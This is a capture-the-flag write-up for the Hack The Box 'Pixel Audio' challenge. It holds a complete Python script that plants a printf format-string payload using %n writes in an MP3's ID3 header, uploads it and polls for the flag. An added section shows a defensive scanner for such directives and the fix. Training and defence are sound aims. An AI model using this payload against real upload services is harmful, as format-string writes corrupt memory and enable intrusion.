HackTheBox Pixel Audio Writeup

Explore the basics of cybersecurity in the Pixel Audio Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/594

Description

Welcome to “Pixel Audio” – your ultimate destination for musical bliss! Embark on a journey of sonic delight as you immerse yourself in the tunes that resonate with your soul. Take a break from the hustle and bustle of life and unwind in our vibrant virtual realm. Whether you’re seeking energetic beats to uplift your spirits or soothing melodies to calm your mind, “Pixel Audio” has you covered. Step into our world, where every note is a pixel of joy, and every rhythm paints a picture of serenity. Join us at “Pixel Audio” and let the music carry you away on a euphoric adventure!

Exploitation

import requests
import time
import sys

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"

def upload_file(url, file_path):
    """ Uploads a file to the server. """
    with open(file_path, 'rb') as file:
        files = {'file': ('test.mp3', file, 'audio/mp3')}
        response = requests.post(url, files=files)
    return response.status_code

def check_for_flag(url):
    """ Requests the /play endpoint to retrieve and display the flag. """
    while True:
        response = requests.get(url)
        if 'HTB' in response.text:
            print("Flag found:", response.text.strip())
            break
        else:
            print("No flag yet, retrying...")
        time.sleep(1)

def main():
    base_url = get_base_url()
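    # File content: the "ID3" magic followed by a printf-style format string.
    # %48879c pads the output by 48879 (0xBEEF) characters and %12$n stores the
    # running output count through the 12th argument; %495c adds 495 more
    # (48879 + 495 = 49374 = 0xC0DE) before %13$n stores through the 13th.
    payload = 'ID3%48879c%12$n%495c%13$n'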
    file_path = '/tmp/test.mp3'
    with open(file_path, 'wb') as f:
        f.write(payload.encode('utf-8'))
    print("Payload written to", file_path)
    upload_url = f'{base_url}/upload'
    play_url = f'{base_url}/play'
    print("Uploading payload...")
    if upload_file(upload_url, file_path) == 200:
        print("Payload uploaded successfully.")
        check_for_flag(play_url)
    else:
        print("Failed to upload payload.")

if __name__ == '__main__':
    main()
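
Added example, not part of the original post or the challenge's code: an upload triage routine that finds printf-style `%n` directives in a file and computes the value each one would store, run here on the payload string from the script above. It assumes the bytes after the 3-byte `ID3` magic reach a printf-style function as the format string, which the payload's directives imply but this page does not show; `trace_writes`, `scan_upload`, `N_MASK` and `SAMPLE` are hypothetical names.

```python
import re

# One printf conversion: optional "N$" position, flags, width, precision, length, type.
DIRECTIVE = re.compile(
    rb"%(?:(?P<pos>\d+)\$)?[-+ #0]*(?P<width>\d+)?(?:\.\d+)?"
    rb"(?P<length>hh|h|ll|l|j|z|t|L)?(?P<conv>[diouxXeEfgGaAcspn%])"
)
# Bits kept by %n per length modifier (assumption: LP64, int is 32-bit).
N_MASK = {b"hh": 0xFF, b"h": 0xFFFF, None: 0xFFFFFFFF}

def trace_writes(fmt: bytes):
    """Return [(argument_position, value_stored)] for each %n in fmt.

    position is None for a non-positional %n; value is None once a
    conversion with data-dependent output length (%s, %d, ...) was seen.
    """
    count, last, writes = 0, 0, []
    for m in DIRECTIVE.finditer(fmt):
        if count is not None:
            count += m.start() - last      # literal bytes are printed as-is
        last = m.end()
        conv, width = m["conv"], int(m["width"] or 0)
        if conv == b"n":
            pos = int(m["pos"]) if m["pos"] else None
            mask = N_MASK.get(m["length"], 0xFFFFFFFFFFFFFFFF)
            writes.append((pos, None if count is None else count & mask))
        elif conv == b"%":
            if count is not None:
                count += 1                 # "%%" prints a single '%'
        elif conv == b"c":
            if count is not None:
                count += max(width, 1)     # %Nc prints exactly max(N, 1) chars
        else:
            count = None                   # output length depends on the argument
    return writes

def scan_upload(data: bytes, magic: bytes = b"ID3"):
    """Triage an upload: list the %n writes found after the file magic."""
    body = data[len(magic):] if data.startswith(magic) else data
    return trace_writes(body)

SAMPLE = b"ID3%48879c%12$n%495c%13$n"      # payload string from the script on this page

if __name__ == "__main__":
    for pos, value in scan_upload(SAMPLE):
        print(f"%n via argument {pos}: stores {value:#x}")
```

Any non-empty result from `scan_upload` is grounds to reject the file before it reaches the parser. On the parsing side, the fix for this bug class is to pass untrusted data as an argument (`printf("%s", data)`), never as the format string.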

Summary

The Pixel Audio Challenge on Hack The Box is a medium-level challenge that introduces users to concepts like file manipulation, server communication, and exploiting vulnerabilities in file formats. In this challenge, participants reverse-engineer an audio parsing binary, craft a payload embedded in an MP3 file, and upload it to a server. The exploit manipulates the ID3 metadata to trigger a response from the server, ultimately revealing the flag. This challenge provides an excellent opportunity for those looking to gain hands-on experience with reversing, web vulnerabilities, and file-based exploitation techniques.

This post is licensed under CC BY 4.0 by the author.